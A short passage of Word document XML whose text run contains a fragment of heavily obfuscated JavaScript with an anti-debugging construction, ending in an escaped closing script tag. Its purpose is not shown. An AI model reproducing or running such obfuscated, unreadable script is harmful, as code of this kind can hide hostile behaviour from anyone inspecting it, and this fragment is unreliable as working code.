return!![];}[oF('0x52b','Z^0j')+oF('0x48d','z0ce')+'r'](s[oF('0x490','ZFj(')](s[oc('1Tq6',-'0x108')],s[oC('0x45d','0x47f')]))[om('0x430','0x451')](s[oc('1yQv',-'0xdf')]):s[om('0x561','0x4bf')](s[oC('0x373','0x43c')],s[om('0x47c','0x540')])?function(){return![];}[oC('0x392','0x404')+oC('0x3bf','0x34f')+'r'](s['UAEXL'](s[oF('0x537','1Tq6')],s[oC('0x45d','0x3eb')]))['apply'](s['XdxPc']):G[v]=r[oC('0x468','0x3fe')+om('0x443','0x450')](L);s[oc('$@9K',-'0x88')](q,++G);}function oK(o,s){return u(o-'0x36e',s);}function oJ(o,s){return u(o- -'0xab',s);}try{if(o)return q;else s[oK('0x62d','z0ce')](q,0xf8d+0x1c59+-0x2be6);}catch(G){}}</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;/script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